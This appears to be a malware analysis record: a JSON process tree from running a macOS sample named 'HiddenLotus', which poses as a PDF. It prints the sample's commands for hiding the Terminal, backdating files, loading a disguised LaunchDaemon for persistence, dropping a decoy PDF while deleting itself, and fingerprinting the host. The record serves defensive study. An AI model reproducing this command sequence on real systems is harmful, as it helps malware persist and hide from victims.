HiddenLotus Process Tree
{
"process_name": "/Users/zingo123/Downloads/HiddenLotus/L\u00ea Thu H\u00e0 (HAEDC).p\u217ef/Contents/MacOS/L\u00ea Thu H\u00e0 (HAEDC)",
"pid": 2535,
"command_line_args": "./L\u00ea Thu H\u00e0 (HAEDC)",
"child_processes": [
{
"process_name": "/bin/sh",
"pid": 2536,
"command_line_args": "sh -c osascript -e 'tell application \"Finder\"' -e 'set visible of process \"Terminal\" to false' -e 'end tell' > /dev/null 2>&1",
"child_processes": [
{
"process_name": "/usr/bin/osascript",
"pid": 2537,
"command_line_args": "osascript -e tell application \"Finder\" -e set visible of process \"Terminal\" to false -e end tell"
}
]
},
{
"process_name": "/bin/sh",
"pid": 2540,
"command_line_args": "sh -c touch -t 1301230549 \"/Library/Spotlight/iWork.mdimporter/Contents/MacOS/mdwork\" >/dev/null 2>&1",
"child_processes": [
{
"process_name": "/usr/bin/touch",
"pid": 2541,
"command_line_args": "touch -t 1301230549 /Library/Spotlight/iWork.mdimporter/Contents/MacOS/mdwork"
}
]
},
{
"process_name": "/bin/sh",
"pid": 2542,
"command_line_args": "sh -c touch -t 1301230549 \"/Library/LaunchDaemons/com.apple.mdwork.shared.plist\" >/dev/null 2>&1",
"child_processes": [
{
"process_name": "/usr/bin/touch",
"pid": 2543,
"command_line_args": "touch -t 1301230549 /Library/LaunchDaemons/com.apple.mdwork.shared.plist"
}
]
},
{
"process_name": "/bin/sh",
"pid": 2544,
"command_line_args": "sh -c launchctl load /Library/LaunchDaemons/com.apple.mdwork.shared.plist > /dev/null 2>&1 &",
"child_processes": [
{
"process_name": "/bin/launchctl",
"pid": 2546,
"command_line_args": "launchctl load /Library/LaunchDaemons/com.apple.mdwork.shared.plist"
}
]
},
{
"process_name": "/bin/sh",
"pid": 2545,
"command_line_args": "sh -c mv -f \"/Users/zingo123/Downloads/HiddenLotus/L\u00ea Thu H\u00e0 (HAEDC).p\u217ef/Contents/Resources/configureDefault.sys\" \"/tmp/L\u00ea Thu H\u00e0 (HAEDC).pdf\" > /dev/null 2>&1 ; open \"/tmp/L\u00ea Thu H\u00e0 (HAEDC).pdf\" & > /dev/null 2>&1 ; rm -rf \"/Users/zingo123/Downloads/HiddenLotus/L\u00ea Thu H\u00e0 (HAEDC).p\u217ef\" > /dev/null 2>&1 ; cp -f \"/tmp/L\u00ea Thu H\u00e0 (HAEDC).pdf\" \"/Users/zingo123/Downloads/HiddenLotus/L\u00ea Thu H\u00e0 (HAEDC).pdf\" > /dev/null 2>&1 ; sleep 3 ; rm -rf \"/tmp/L\u00ea Thu H\u00e0 (HAEDC).pdf\" > /dev/null 2>&1",
"child_processes": [
{
"process_name": "/bin/mv",
"pid": 2547,
"command_line_args": "mv -f /Users/zingo123/Downloads/HiddenLotus/L\u00ea Thu H\u00e0 (HAEDC).p\u217ef/Contents/Resources/configureDefault.sys /tmp/L\u00ea Thu H\u00e0 (HAEDC).pdf"
},
{
"process_name": "/usr/bin/open",
"pid": 2549,
"command_line_args": "open /tmp/L\u00ea Thu H\u00e0 (HAEDC).pdf"
},
{
"process_name": "/bin/rm",
"pid": 2550,
"command_line_args": "rm -rf /Users/zingo123/Downloads/HiddenLotus/L\u00ea Thu H\u00e0 (HAEDC).p\u217ef"
},
{
"process_name": "/bin/cp",
"pid": 2551,
"command_line_args": "cp -f /tmp/L\u00ea Thu H\u00e0 (HAEDC).pdf /Users/zingo123/Downloads/HiddenLotus/L\u00ea Thu H\u00e0 (HAEDC).pdf"
},
{
"process_name": "/bin/sleep",
"pid": 2552,
"command_line_args": "sleep 3"
},
{
"process_name": "/bin/rm",
"pid": 2561,
"command_line_args": "rm -rf /tmp/L\u00ea Thu H\u00e0 (HAEDC).pdf"
}
]
}
]
}
{
"process_name": "/dev/console",
"pid": 2548,
"command_line_args": "xpcproxy com.apple.mdwork.shared",
"child_processes": [
{
"process_name": "/bin/sh",
"pid": 2553,
"command_line_args": "sh -c sw_vers -productVersion 2>&1",
"child_processes": [
{
"process_name": "/usr/bin/sw_vers",
"pid": 2554,
"command_line_args": "sw_vers -productVersion"
}
]
},
{
"process_name": "/bin/sh",
"pid": 2556,
"command_line_args": "sh -c uname -m 2>&1",
"child_processes": [
{
"process_name": "/usr/bin/uname",
"pid": 2557,
"command_line_args": "uname -m"
}
]
},
{
"process_name": "/bin/sh",
"pid": 2564,
"command_line_args": "sh -c sw_vers -productVersion 2>&1",
"child_processes": [
{
"process_name": "/usr/bin/sw_vers",
"pid": 2565,
"command_line_args": "sw_vers -productVersion"
}
]
},
{
"process_name": "/bin/sh",
"pid": 2566,
"command_line_args": "sh -c uname -m 2>&1",
"child_processes": [
{
"process_name": "/usr/bin/uname",
"pid": 2567,
"command_line_args": "uname -m"
}
]
},
{
"process_name": "/bin/sh",
"pid": 2568,
"command_line_args": "sh -c sw_vers -productVersion 2>&1",
"child_processes": [
{
"process_name": "/usr/bin/sw_vers",
"pid": 2569,
"command_line_args": "sw_vers -productVersion"
}
]
},
{
"process_name": "/bin/sh",
"pid": 2570,
"command_line_args": "sh -c uname -m 2>&1",
"child_processes": [
{
"process_name": "/usr/bin/uname",
"pid": 2571,
"command_line_args": "uname -m"
}
]
}
]
}
